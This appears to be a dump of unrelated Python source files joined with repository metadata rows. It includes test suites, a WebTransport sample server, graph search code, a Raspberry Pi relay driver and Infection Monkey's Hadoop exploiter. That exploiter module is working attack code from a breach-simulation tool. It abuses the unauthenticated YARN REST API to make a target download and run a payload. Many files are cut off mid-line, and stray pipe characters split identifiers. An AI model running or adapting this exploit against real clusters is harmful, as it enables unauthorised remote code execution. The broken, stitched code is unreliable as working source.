from robottelo.cli.host import Host
from robottelo.cli.repository import Repository
from robottelo.cli.repository_set import RepositorySet
from robottelo.cli.subscription import Subscription
from robottelo.constants import (
PRDS,
REPOS,
REPOSET,
DEFAULT_SUBSCRIPTION_NAME,
SATELLITE_SUBSCRIPTION_NAME,
)
from robottelo.decorators import (
run_in_one_thread,
skip_if_bug_open,
tier1,
tier2,
tier3,
upgrade
)
from robottelo.ssh import download_file, upload_file
from robottelo.test import CLITestCase
from robottelo.vm import VirtualMachine
@run_in_one_thread
class SubscriptionTestCase(CLITestCase):
| """Manifest CLI tests"""
def setUp( | self):
"""Tests for content-view via Hammer CLI"""
super(SubscriptionTestCase, self).setUp()
self.org = make_org()
# pylint: disable=no-self-use
def _upload_manifest(self, org_id, manifest=None):
"""Uploads a manifest into an organization.
A cloned manifest will be used if ``manifest`` is None.
"""
if manifest is None:
manifest = manifests.clone()
self.upload_manifest(org_id, manifest)
@staticmethod
def _read_csv_file(file_path):
"""Read a csv file as a dictionary
:param str file_path: The file location path to read as csv
:returns a tuple (list, list[dict]) that represent field_names, data
"""
csv_data = []
with open(file_path, 'r') as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=',')
field_names = csv_reader.fieldnames
for csv_row in csv_reader:
csv_data.append(csv_row)
return field_names, csv_data
@staticmethod
def _write_csv_file(file_path, filed_names, csv_data):
"""Write to csv file
:param str file_path: The file location path to write as csv
:param list filed_names: The field names to be written
:param list[dict] csv_data: the list dict data to be saved
"""
with open(file_path, 'w') as csv_file:
csv_writer = csv.DictWriter(csv_file, filed_names, delimiter=',')
csv_writer.writeheader()
for csv_row in csv_data:
csv_writer.writerow(csv_row)
@tier1
def test_positive_manifest_upload(self):
"""upload manifest
:id: e5a0e4f8-fed9-4896-87a0-ac33f6baa227
:expectedresults: Manifest are uploaded properly
:CaseImportance: Critical
"""
self._upload_manifest(self.org['id'])
Subscription.list(
{'organization-id': self.org['id']},
per_page=False,
)
@tier1
@upgrade
def test_positive_manifest_delete(self):
"""Delete uploaded manifest
:id: 01539c07-00d5-47e2-95eb-c0fd4f39090f
:expectedresults: Manifest are deleted properly
:CaseImportance: Critical
"""
self._upload_manifest(self.org['id'])
Subscription.list(
{'organization-id': self.org['id']},
per_page=False,
)
Subscription.delete_manifest({
'organization-id': self.org['id'],
})
Subscription.list(
{'organization-id': self.org['id']},
per_page=False,
)
@tier2
@upgrade
def test_positive_enable_manifest_reposet(self):
"""enable repository set
:id: cc0f8f40-5ea6-4fa7-8154-acdc2cb56b45
:expectedresults: you are able to enable and synchronize repository
contained in a manifest
:CaseLevel: Integration
:CaseImportance: Critical
"""
self._upload_manifest(self.org['id'])
Subscription.list(
{'organization-id': self.org['id']},
per_page=False,
)
RepositorySet.enable({
'basearch': 'x86_64',
'name': REPOSET['rhva6'],
'organization-id': self.org['id'],
'product': PRDS['rhel'],
'releasever': '6Server',
})
Repository.synchronize({
'name': REPOS['rhva6']['name'],
'organization-id': self.org['id'],
'product': PRDS['rhel'],
})
@tier1
def test_positive_manifest_history(self):
"""upload manifest and check history
:id: 000ab0a0-ec1b-497a-84ff-3969a965b52c
:expectedresults: Manifest history is shown properly
:CaseImportance: Critical
"""
self._upload_manifest(self.org['id'])
Subscription.list(
{'organization-id': self.org['id']},
per_page=None,
)
history = Subscription.manifest_history({
'organization-id': self.org['id'],
})
self.assertIn(
'{0} file imported successfully.'.format(self.org['name']),
''.join(history),
)
@tier1
@upgrade
def test_positive_manifest_refresh(self):
"""upload manifest and refresh
:id: 579bbbf7-11cf-4d78-a3b1-16d73bd4ca57
:expectedresults: Manifests can be refreshed
:CaseImportance: Critical
"""
self._upload_manifest(
self.org['id'], manifests.original_manifest())
Subscription.list(
{'organization-id': self.org['id']},
per_page=False,
)
Subscription.refresh_manifest({
'organization-id': self.org['id'],
})
Subscription.delete_manifest({
'organization-id': self.org['id'],
})
@skip_if_bug_open('bugzilla', 1226425)
@tier1
def test_negative_manifest_refresh(self):
"""manifest refresh must fail with a cloned manifest
:id: 7f40795f-7841-4063-8a43-de0325c92b1f
:expectedresults: the refresh command returns a non-zero return code
:BZ: 1226425
:CaseImportance: Critical
"""
self._upload_manifest(self.org['id'])
Subscription.list(
{'organization-id': self.org['id']},
per_page=False,
)
with self.assertRaises(CLIReturnCodeError):
Subscription.refresh_manifest({
'organization-id': self.org['id'],
})
@tier3
def test_positive_restore_ak_and_content_hosts_subscriptions(self):
"""Restore activation key and content hosts subscriptions
:id: a44fdeda-9c8c-4316-85b4-a9b6b9f1ffdb
:customerscenario: true
:steps:
1. Setup activation key , lifecycle environment and content view
with RH repository
2. Add RH subscription to activation key
3. Setup hosts (minimum two) and subscribe them to activation key
4. Attach RH subscription to the created content hosts
5. export the activation key and content hosts subscriptions
6. Delete the subscription manifest
7. Ensure that the activation key and content hosts subscriptions
does not exist
8. Upload the subscription manifest
9. Ensure the activation key and content hosts subscriptions does
not exist
10. Restore the activation key and content hosts subscriptions
:expectedresults: activation key and content hosts subscriptions
restored
:CaseImportance: Critical
"""
lce = make_lifecycle_environment({'organization-id': self.org['id']})
activation_key = make_activation_key({
'organization-id': self.org['id'],
'lif |
beaufortfrancois/samples | webtransport/webtransport_server.py | Python | apache-2.0 | 9,308 | 0.000215 | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An example WebTransport over HTTP/3 server based on the aioquic library.
Processes incoming streams and datagrams, and
replies with the ASCII-encoded length of the data sent in bytes.
Example use:
python3 webtransport_server.py certificate.pem certificate.key
Example use from JavaScript:
let transport = new WebTransport("https://localhost:4433/counter");
await transport.ready;
let stream = await transport.createBidirectionalStream();
let encoder = new TextEncoder();
let writer = stream.writable.getWriter();
await writer.write(encoder.encode("Hello, world!"))
writer.close();
console.log(await new Response(stream.readable).text());
This will output "13" (the length of "Hello, world!") into the console.
"""
# ---- Dependencies ----
#
# This server only depends on Python standard library and aioquic 0.9.15 or
# later. See https://github.com/aiortc/aioquic for instructions on how to
# install aioquic.
#
# ---- Certificates ----
#
# HTTP/3 always operates using TLS, meaning that running a WebTransport over
# HTTP/3 server requires a valid TLS certificate. The easiest way to do this
# is to get a certificate from a real publicly trusted CA like
# <https://letsencrypt.org/>.
# https://developers.google.com/web/fundamentals/security/encrypt-in-transit/enable-https
# contains a detailed explanation of how to achieve that.
#
# As an alternative, Chromium can be instructed to trust a self-signed
# certificate using command-line flags. Here are step-by-step instructions on
# how to do that:
#
# 1. Generate a certificate and a private key:
# openssl req -newkey rsa:2048 -nodes -keyout certificate.key \
# -x509 -out certificate.pem -subj '/CN=Test Certificate' \
# -addext "subjectAltName = DNS:localhost"
#
# 2. Compute the fingerprint of the certificate:
# openssl x509 -pubkey -noout -in certificate.pem |
# openssl rsa -pubin -outform der |
# openssl dgst -sha256 -binary | base64
# The result should be a base64-encoded blob that looks like this:
# "Gi/HIwdiMcPZo2KBjnstF5kQdLI5bPrYJ8i3Vi6Ybck="
#
# 3. Pass a flag to Chromium indicating what host and port should be allowed
# to use the self-signed certificate. For instance, if the host is
# localhost, and the port is 4433, the flag would be:
# --origin-to-force-quic-on=localhost:4433
#
# 4. Pass a flag to Chromium indicating which certificate needs to be trusted.
# For the example above, that flag would be:
# --ignore-certificate-errors-spki-list=Gi/HIwdiMcPZo2KBjnstF5kQdLI5bPrYJ8i3Vi6Ybck=
#
# See https://www.chromium.org/developers/how-tos/run-chromium-with-flags for
# details on how to run Chromium with flags.
import argparse
import asyncio
import logging
from collections import defaultdict
from typing import Dict, Optional
from aioquic.asyncio import QuicConnectionProtocol, serve
from aioquic.h3.connection import H3_ALPN, H3Connection
from aioquic.h3.events import H3Event, HeadersReceived, WebTransportStreamDataReceived, DatagramReceived
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.connection import stream_is_unidirectional
from aioquic.quic.events import ProtocolNegotiated, StreamReset, QuicEvent
BIND_ADDRESS = '::1'
BIND_PORT = 4433
logger = logging.getLogger(__name__)
# CounterHandler implements a really simple protocol:
# - For every incoming bidirectional stream, it counts bytes it receives on
# that stream until the stream is closed, and then replies with that byte
# count on the same stream.
# - For every incoming unidirectional stream, it counts bytes it receives on
# that stream until the stream is closed, and then replies with that byte
# count on a new unidirectional stream.
# - For every incoming datagram, it sends a datagram with the length of
# datagram that was just received.
class CounterHandler:
def __init__(self, session_id, http: H3Connection) -> None:
self._session_id = session_id
self._http = http
self._counters = defaultdict(int)
def h3_event_received(self, event: H3Event) -> None:
if isinstance(event, DatagramReceived):
payload = str(len(event.data)).encode('ascii')
self._http.send_datagram(self._session_id, payload)
if isinstance(event, WebTransportStreamDataReceived):
self._counters[event.stream_id] += len(event.data)
if event.stream_ended:
if stream_is_unidirectional(event.stream_id):
response_id = self._http.create_webtransport_stream(
self._session_id, is_unidirectional=True)
else:
response_id = event.stream_id
payload = str(self._counters[event.stream_id]).encode('ascii')
self._http._quic.send_stream_data(
response_id, payload, end_stream=True)
self.stream_closed(event.stream_id)
def stream_closed(self, stream_id: int) -> None:
try:
del self._counters[stream_id]
except KeyError:
pass
# WebTransportProtocol handles the beginning of a WebTransport connection: it
# responses to an extended CONNECT method request, and routes the transport
# events to a relevant handler (in this example, CounterHandler).
class WebTransportProtocol(QuicConnectionProtocol):
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._http: Optional[H3Connection] = None
self._handler: Optional[CounterHandler] = None
def quic_event_received(self, event: QuicEvent) -> None:
if isinstance(event, ProtocolNegotiated):
self._http = H3Connection(self._quic, enable_webtransport=True)
elif isinstance(event, StreamReset) and self._handler is not None:
# Streams in QUIC can be closed in two ways: normal (FIN) and
# abnormal (resets). FIN is handled by the handler; the code
# below handles the resets.
self._handler.stream_closed(event.stream_id)
if self._http is not None:
for h3_event in self._http.handle_event(event):
self._h3_event_received(h3_event)
def _h3_event_received(self, event: H3Event) -> None:
if isinstance(event, HeadersReceived):
headers = {}
for header, value in event.headers:
headers[header] = value
if (headers.get(b":method") == b"CONNECT" and
headers.get(b":protocol") == b"webtransport"):
self._handshake_webtransport(event.stream_id, headers)
else:
self._send_response(event.stream_id, 400, end_stream=True)
if self._handler:
self._handler.h3_event_received(event)
def _handshake_webtransport(self,
stream_id: int,
request_headers: Dict[bytes, bytes]) -> None:
authority = request_headers.get(b":authori | ty")
path = request_headers.get(b":path")
if authority is Non | e or path is None:
# `:authority` and `:path` must be provided.
self._send_response(stream_id, 400, end_stream=True)
return
if path == b"/counter":
assert(self._handler is None)
self._handler = CounterHandler(stream_id, self._http)
self._send_response(stream_id, 200)
else:
self._send_response(stream_id, |
Nithanaroy/GeoReachPaths | Naive.py | Python | apache-2.0 | 9,722 | 0.003394 | import time, heapq
from itertools import count
import networkx as nx
from pymongo import MongoClient
from Common import MONGO_URL, USER_NODE_PREFIX, BUSINESS_NODE_PREFIX, construct_graph, path_length
def topk_naive2(G, s, R, K):
"""
finds all business in the region and returns an iterator of K shortest paths
find shortest path to all reachable nodes from source by Disjktra's
return paths and lengths for filtered nodes in the region by R-Tree
:param G: NetworkX Graph instance
:param s: Source vertex's ID as a string or number that can be found in G
:param R: Region of interest as list of co-ordinates [nelat, nelong, swlat, swlong]
:param K: Number of shortest paths to compute
:return: Iterator of tuples (distance from s, path from s)
"""
# start = time.time()
# print '\nStarted Algorithm at %s' % (start,)
biz = business_in_loc(R[0], R[1], R[2], R[3])
# print 'After %ss: Found %s businesses in the region %s' % (time.time() - start, len(biz), R)
length, path = nx.single_source_dijkstra(G, s)
res = []
for b in biz:
b = BUSINESS_NODE_PREFIX + b
try:
res.append((length[b], path[b], b))
except KeyError:
# This business is not reachable from s
res.append((float("inf"), [], b))
# print 'After %ss: Found shortest path from %s to %s' % (time.time() - start, s, b)
res.sort()
return res[:K]
def topk_naive3(G, source, R, K):
"""
Traverses the graph using Dijkstra's and stops ones K nodes are found in R
No spatial index is used
:param G: NetworkX Graph instance
:param source: Source vertex's ID as a string or number that can be found in G
:param R: Region of interest as list of co-ordinates [nelat, nelong, swlat, swlong]
:param K: Number of shortest paths to compute
:return: Iterator of tuples (distance from s, path from s)
"""
start = time.time()
paths = {source: [source]}
dist = {} # dictionary of final distances
seen = {source: 0} # intermediate distances from source
c = count()
fringe = [] # use heapq with (distance,label) tuples
nearest_vertices = [] # vertices that fall in R sorted by distance from source
heapq.heappush(fringe, (0, next(c), source))
while fringe:
(d, _, v) = heapq.heappop(fringe)
if v in dist:
continue # already searched this node.
dist[v] = d
if _vertex_lies_in(G, v, R): # if v lies in the given region R
nearest_vertices.append(v) # collect the vertex
if len(nearest_vertices) == K: # if K vertices are collected
break # stop Dijkstra's
for u, e in G.succ[v].items():
vu_dist = dist[v] + e.get('weight')
if u not in seen or vu_dist < seen[u]:
seen[u] = vu_dist
heapq.heappush(fringe, (vu_dist, next(c), u))
if paths is not None:
paths[u] = paths[v] + [u]
# print "After %ss: Found topK" % (time.time() - start,)
return nearest_vertices, dist, paths
def _vertex_lies_in(G, v, R):
"""
Checks if vertex v lies in region R
:param G: NetworkX Graph instance
:param v: any vertex in the Graph
:param R: list of co-ordinates (nelat, nelong, swlat, swlong)
:return: True if v lies in R, else False
"""
if 'spatial' in G.node[v]:
lat = G.node[v]['spatial']['lat']
lng = G.node[v]['spatial']['lng']
return R[2] <= lat <= R[0] and R[3] <= lng <= R[1]
return False
class TopKNaive4:
"""
Uses A* with landmark to find the shortest paths between s and all vertices in R
Then picks the top-k from them
"""
def __init__(self, G, resolution):
"""
Constructor
:param G: NetworkX directed graph instance
:param resolution: resolution used in the spatial index - GeoReachPaths
"""
self.G = G
self.resolution = resolution
self.index = self._landmark_index()
def run(self, s, R, K):
"""
Uses A* with landmark to find the shortest paths between s and all vertices in R
Then picks the top-k from them
Requires MongoDB to perform spatial range query for R
:param G: NetworkX directed graph instance
:param s: source vertex
:param R: Region of interest as list of co-ordinates [nelat, nelong, swlat, swlong]
:param K: Number of shortest paths to compute
:return: Iterator of tuples (distance from s, path from s)
"""
biz = business_in_loc(R[0], R[1], R[2], R[3])
res = []
for b in biz:
b = BUSINESS_NODE_PREFIX + b
try:
path = nx.astar_path(self.G, s, b, self._heuristic)
res.append((path_length(self.G, path), path, b))
except nx.NetworkXNoPath:
res.append((float("inf"), [], b)) # This business is not reachable from s
res.sort()
return res[:K]
def _landmark_index(self):
"""
Uses any of the landmark selection algorithms and returns a list of landmarks and the shortest paths to all of its
reachable vertices
:return: {landmark1: {v1: 5, v2: 10, ...}, landmark2: {v1: 4, v2: 15}}
"""
landmarks = self._pick_landmarks(self.resolution)
return {l: nx.single_source_dijkstra_path_length(self.G, l) for l in landmarks}
@staticmethod
def _pick_landmarks(resolution):
"""
Uses any of the landmark selection algorithms and returns a list of landmarks
:param resolution: resolution used in spatial index
:return: [landmark1, landmark2]
"""
landmarks = {5: ["Umng_wOkmTMboTVon340-xw"], 25: ["Umng_wOkmTMboTVon340-xw"], 125: ["Umng_wOkmTMboTVon340-xw"],
625: ["Umng_wOkmTMboTVon340-xw"],
3125: ['Umng_wOkmTMboTVon340-xw', 'UVcnb1imy3F_zNXkIA4tsvg', 'BQkttdZaXAt5csTYffJvVfg',
'UTyjPzE9tphy-m_khJe8SrQ', 'UWuXYZoRLG4_EKD4jdk1WuA', 'UWrHzMQEVgjklCckIVHogQg']}
return landmarks[resolution] # ideally we should have computed this piece
def _heuristic(self, u, v):
"""
Returns the heuristic distance between u and v
:return: x where distance(u to v) >= x
"""
best = 0
for l in self.index:
if v in self.index[l] and u in self.index[l]:
h = self.index[l][v] - self.index[l][u]
if h > best:
best = h
return best
def topk_naive(G, s, R, K):
"""
finds all business in the region and ret | urns an iterator of K shortest paths
for each business in t | he region filtered by an RTree, find the shortest path from source
:param G: NetworkX Graph instance
:param s: Source vertex's ID as a string or number that can be found in G
:param R: Region of interest as list of co-ordinates [nelat, nelong, swlat, swlong]
:param K: Number of shortest paths to compute
Iterator of tuples (distance from s, path from s)
"""
start = time.time()
print '\nStarted Algorithm at %s' % (start,)
biz = business_in_loc(R[0], R[1], R[2], R[3])
print 'After %ss: Found %s businesses in the region %s' % (time.time() - start, len(biz), R)
res = []
s = USER_NODE_PREFIX + s
for b in biz:
b = BUSINESS_NODE_PREFIX + b
length, path = nx.single_source_dijkstra(G, s, b)
try:
res.append((length[b], path[b], b))
except KeyError:
# This business is not reachable from s
res.append((float("inf"), [], b))
print 'After %ss: Found shortest path from %s to %s' % (time.time() - start, s, b)
res.sort()
return res[:K]
def business_in_loc(nelat, nelong, swlat, swlong):
"""
Finds businesses in a given region
:param nelat: Latitude of the northeast coordinate
:param nelong: Longitude of the northeast coordinate
:param swlat: Latitude of the southwest coordinate
:param swlong: Longitude of the southwest coordinate
:return: a |
mecworks/garden_pi | common/relay.py | Python | mit | 2,522 | 0.002379 | #!/usr/bin/env python
# A Raspberry Pi GPIO based relay device
import RPi.GPIO as GPIO
from common.adafruit.Adafruit_MCP230xx.Adafruit_MCP230xx import Adafruit_MCP230XX
class Relay(object):
_mcp23017_chip = {} # Conceivably, we could have up to 8 of these as there are a possibility of 8 MCP chips on a bus.
def __init__(self, mcp_pin, i2c_address=0x27):
"""
Initialize a relay
:param mcp_pin: BCM gpio number that is connected to a relay
:return:
"""
self.ON = 0
self.OFF = 1
self._i2c_address = i2c_address
self._mcp_pin = mcp_pin
if GPIO.RPI_REVISION == 1:
i2c_busnum = 0
else:
i2c_busnum = 1
if not self._mcp23017_chip.has_key(self._i2c_address):
self._mcp23017_chip[self._i2c_address] = Adafruit_MCP230XX(busnum=i2c_busnum, address=self._i2c_address, num_gpios=16)
self._relay = self._mcp23017_chip[self._i2c_address]
self._relay.config(self._mcp_pin, self._relay.OUTPUT)
self._relay.output(self._mcp_pin, self.OFF)
self.state = self.OFF
def set_state(self, state):
"""
Set the state of the relay. relay.ON, relay.OFF
:param state:
:return:
"""
if state == self.ON:
self._relay.output(self._mcp_pin, self.ON)
self.state = self.ON
elif state == self.OFF:
self._relay.output(self._mcp_pin, self.OFF)
self.state = self.OFF
def toggle(self):
"""
Toggle the state of a relay
:return:
"""
if self.state == self.ON:
self._relay.output(self._mcp_pin, self.OFF)
self.state = self.OFF
else:
self._relay.output(self._mcp_pin, self.ON)
self.state = self.ON
def get_state(self):
return self.state
if __name__ == '__main__':
import time
pause = . | 15
for pin in range(16):
print("Pin: %s" % pin)
r = Relay(pin)
r.set_state(r.ON)
time.sleep(pause)
r.set_state(r.OFF)
time.sleep(pause)
r.toggle()
time.sleep(pause)
r.toggle()
time.sleep(pause)
r1 = Relay(10)
r2 = Relay(2)
r3 = Relay(15)
r1.set_state(r1.ON)
print(r1._mcp_pin)
r2.set_state(r2. | ON)
print(r2._mcp_pin)
r3.set_state(r3.ON)
print(r3._mcp_pin)
time.sleep(1)
r1.set_state(r1.OFF)
r2.set_state(r2.OFF)
r3.set_state(r3.OFF) |
guardicore/monkey | monkey/infection_monkey/exploit/hadoop.py | Python | gpl-3.0 | 4,087 | 0.001223 | """
Remote code execution on HADOOP server with YARN and default settings
Implementation is based on code from
https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""
import json
import posixpath
import string
from random import SystemRandom
import requests
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from infection_monkey.exploit.tools.helpers import get_monkey_depth
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import (
HADOOP_LINUX_COMMAND,
HADOOP_WINDOWS_COMMAND,
ID_STRING,
MONKEY_ARG,
)
from infection_monkey.utils.commands import build_monkey_commandline
class HadoopExploiter(WebRCE):
_TARGET_OS_TYPE = ["linux", "windows"]
_EXPLOITED_SERVICE = "Hadoop"
HADOOP_PORTS = [("8088", False)]
# How long we have our http server open for downloads in seconds
DOWNLOAD_TIMEOUT = 60
# Random string's length that's used for creating unique app name
RAN_STR_LEN = 6
def __init__(self, host):
super(HadoopExploiter, self).__init__(host)
def _exploit_host(self):
# Try to get exploitable url
urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
self.add_vulnerable_urls(urls, True)
if not self.vulnerable_urls:
return False
# We presume hadoop works only on 64-bit machines
if self.host.os["type"] == "windows":
self.host.os["machine"] = " | 64"
paths = self.get_mon | key_paths()
if not paths:
return False
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])
command = self.build_command(paths["dest_path"], http_path)
if not self.exploit(self.vulnerable_urls[0], command):
return False
http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop()
self.add_executed_cmd(command)
return True
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp["application-id"]
# Create a random name for our application in YARN
safe_random = SystemRandom()
rand_name = ID_STRING + "".join(
[safe_random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)]
)
payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
)
return resp.status_code == 202
def check_if_exploitable(self, url):
try:
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"),
timeout=LONG_REQUEST_TIMEOUT,
)
except requests.ConnectionError:
return False
return resp.status_code == 200
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
)
if "linux" in self.host.os["type"]:
base_command = HADOOP_LINUX_COMMAND
else:
base_command = HADOOP_WINDOWS_COMMAND
return base_command % {
"monkey_path": path,
"http_path": http_path,
"monkey_type": MONKEY_ARG,
"parameters": monkey_cmd,
}
@staticmethod
def build_payload(app_id, name, command):
payload = {
"application-id": app_id,
"application-name": name,
"am-container-spec": {
"commands": {
"command": command,
}
},
"application-type": "YARN",
}
return payload
|
palette-software/palette | controller/controller/email_limit.py | Python | gpl-3.0 | 4,376 | 0.001371 | """ Email limiter """
import logging
from sqlalchemy import Column, BigInteger, DateTime, func
from sqlalchemy.schema import ForeignKey
import akiri.framework.sqlalchemy as meta
from event_control import EventControl
from manager import Manager
from system import SystemKeys
logger = logging.getLogger()
class EmailLimitEntry(meta.Base):
# pylint: disable=no-init
__tablename__ = "email_sent"
emailid = Column(BigInteger, unique=True, nullable=False,
autoincrement=True, primary_key=True)
envid = Column(BigInteger, ForeignKey("environment.envid"))
eventid = Column(BigInteger) # Just kept to help. Not required.
creation_time = Column(DateTime, server_default=func.now())
@classmethod
def remove_all(cls, envid):
session = meta.Session()
session.query(EmailLimitEntry).\
filter(EmailLimitEntry.envid == envid).\
delete()
session.commit()
class EmailLimitManager(Manager):
""" Ensures that email is no | t sent too frequently. """
def _log_email(self, eventid):
session = meta.Session()
entry = EmailLimitEntry(envid=self.envid, eventid=eventid)
session.add(entry)
session.commit()
def _prune(self):
"""Keep only the the ones in the last email-lookback-minutes
period."""
email_lookback_minutes = self.system[SystemKeys.EMAIL_LOOKBACK_MINUTES]
stmt = ("DELETE from email_sent "
| "where creation_time < NOW() - INTERVAL '%d MINUTES'") % \
(email_lookback_minutes,)
connection = meta.get_connection()
result = connection.execute(stmt)
connection.close()
logger.debug("email limit manager: pruned %d", result.rowcount)
def _recent_count(self):
return meta.Session.query(EmailLimitEntry).\
filter(EmailLimitEntry.envid == self.envid).\
count()
def email_limit_reached(self, event_entry, eventid):
"""Keep track of how many emails have been sent during the last
email-lookback-minutes period and check to see if
email-max-count have already been sent. Return:
count-of-emails-sent-recently: if email_limit reached
reached (don't send more
emails).
False if email-limit hasn't been reached (keep sending emails).
"""
logger.debug("email_limit_reached checking: event %s, eventid %s\n",
event_entry.key, eventid)
# We limit only ERROR events.
if event_entry.level != 'E' or \
event_entry.key in [EventControl.EMAIL_TEST,
EventControl.EMAIL_SPIKE]:
# These events can always be emailed and don't count against
# the maximum.
return False
self._log_email(eventid)
self._prune() # Keep only the last email-looback-minutes rows
emails_sent_recently = self._recent_count()
email_lookback_minutes = self.system[SystemKeys.EMAIL_LOOKBACK_MINUTES]
logger.debug("email_limit: sent %d error emails in the last "
"%d minutes.",
emails_sent_recently, email_lookback_minutes)
email_max_count = self.system[SystemKeys.EMAIL_MAX_COUNT]
if emails_sent_recently > email_max_count:
# Don't sent this email alert
# send an alert that we're disabling email alerts
self._eventit()
# Disable email alerts
self.system[SystemKeys.ALERTS_ADMIN_ENABLED] = False
self.system[SystemKeys.ALERTS_PUBLISHER_ENABLED] = False
self.system[SystemKeys.EMAIL_SPIKE_DISABLED_ALERTS] = True
meta.commit()
return emails_sent_recently
# Send this email alert
return False
def _eventit(self):
"""Send the EMAIL-SPIKE event."""
email_lookback_minutes = self.system[SystemKeys.EMAIL_LOOKBACK_MINUTES]
email_max_count = self.system[SystemKeys.EMAIL_MAX_COUNT]
data = {'email_lookback_minutes': email_lookback_minutes,
'email_max_count': email_max_count}
self.server.event_control.gen(EventControl.EMAIL_SPIKE, data)
|
Alex-Diez/python-tdd-katas | b_tree_list_kata/day_10.py | Python | mit | 3,899 | 0 | import unittest
PAGE_SIZE = 16
class BtreeList(object):
def __init__(self):
self._root = Page(True)
def __iadd__(self, item):
right = self._root.add_item(item)
if right is not self._root:
left = self._root
self._root = Page(False)
self._root.add_page(left)
self._root.add_page(right)
return self
def __contains__(self, item):
return item in self._root
class Page(object):
def __init__(self, external):
self._entries = []
self._preallocate_entries()
self._size = 0
self._external = external
def _preallocate_entries(self):
for _ in range(PAGE_SIZE):
self._entries.append(None)
def __getitem__(self, index):
return self._entries[index]
def __setitem__(self, index, item):
self._entries[index] = item
def _is_full(self):
return self._size == 16
def add_item(self, item):
if self._external:
self._add_entry(Entry(item))
if self._is_full():
return self.split()
else:
index = self._page_for_item(item)
page = self[index] + item
if page is not self[index].page():
left, right = self.add_page(page)
if right is not None:
return right
else:
return left
return self
def _page_for_item(self, item):
for index in range(self._size):
if self[index] > item:
return index - 1
| return self._size - 1
def add_page(self, page):
self._add_entry(Entry(page[0].key(), page))
if self._is_full():
return self, self.split()
else:
return self, None
def _add_entry(self, entry):
self[self._size] = entry
self._size += 1
def __contains__(self, item):
if self._external:
| return any(self[:self._size])
else:
index = self._page_for_item(item)
return item in self[index]
def split(self):
half = self._size // 2
page = Page(self._external)
for index in range(half, self._size):
if self._external:
page.add_item(self[index].key())
else:
page.add_page(self[index].page())
self[index] = None
self._size = half
return page
class Entry(object):
def __init__(self, key, page=None):
self._key = key
self._page = page
def __eq__(self, item):
return self._key == item
def __gt__(self, item):
return self._key > item
def __contains__(self, item):
return item in self._page
def __add__(self, item):
return self._page.add_item(item)
def key(self):
return self._key
def page(self):
return self._page
class BtreeListTest(unittest.TestCase):
def setUp(self):
self.list = BtreeList()
def testListContainsManyAddedValues(self):
self.list += 1
self.list += 2
self.list += 3
self.assertTrue(1 in self.list)
self.assertTrue(2 in self.list)
self.assertTrue(3 in self.list)
def testListContainsMoreThanPage(self):
for i in range(PAGE_SIZE + 1):
self.list += i
for i in range(PAGE_SIZE + 1):
self.assertTrue(i in self.list)
def testListContainsMoreThanOneLevel(self):
for i in range(PAGE_SIZE ** 2 + 1):
self.list += i
for i in range(PAGE_SIZE ** 2 + 1):
self.assertTrue(i in self.list)
def testListContainsHugeNumberOfAddedValues(self):
for i in range(PAGE_SIZE ** 4 + 1):
self.list += i
for i in range(PAGE_SIZE ** 4 + 1):
self.assertTrue(i in self.list)
|
solus-cold-storage/evopop-gtk-theme | src/render-gtk3-assets.py | Python | gpl-3.0 | 5,791 | 0.001554 | #!/usr/bin/python3
# Thanks to the GNOME theme nerds for the original source of this script
import os
import sys
import xml.sax
import subprocess
INKSCAPE = '/usr/bin/inkscape'
OPTIPNG = '/usr/bin/optipng'
MAINDIR = '../EvoPop'
SRC = os.path.join('.', 'gtk3')
inkscape_process = None
def optimize_png(png_file):
if os.path.exists(OPTIPNG):
process = subprocess.Popen([OPTIPNG, '-quiet', '-o7', png_file])
process.wait()
def wait_for_prompt(process, command=None):
if command is not None:
process.stdin.write((command+'\n').encode('utf-8'))
# This is kinda ugly ...
# Wait for just a '>', or '\n>' if some other char appearead first
output = process.stdout.read(1)
if output == b'>':
return
output += process.stdout.read(1)
while output != b'\n>':
output += process.stdout.read(1)
output = output[1:]
def start_inkscape():
process = subprocess.Popen(
[INKSCAPE, '--shell'],
bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE
)
wait_for_prompt(process)
return process
def inkscape_render_rect(icon_file, rect, output_file):
global inkscape_process
if inkscape_process is None:
inkscape_process = start_inkscape()
wait_for_prompt(inkscape_process,
'%s -i %s -e %s' %
(icon_file, rect, output_file))
optimize_png(output_file)
class ContentHandler(xml.sax.ContentHandler):
ROOT = 0
SVG = 1
LAYER = 2
OTHER = 3
TEXT = 4
def __init__(self, path, force=False, filter=None):
self.stack | = [self.ROOT]
self.inside = [self.ROOT]
self.path = path
self.rects = []
self.state = self.ROOT
self.chars = ""
self.force = force
self.filter = filter
def endDocument(self):
pass
def startElement(self, name, attrs):
if self.inside[-1] == self.ROOT:
if name == "svg":
self.stack.append(self.SVG)
self.inside.append(self.SVG)
return
elif | self.inside[-1] == self.SVG:
if (name == "g" and ('inkscape:groupmode' in attrs) and ('inkscape:label' in attrs)
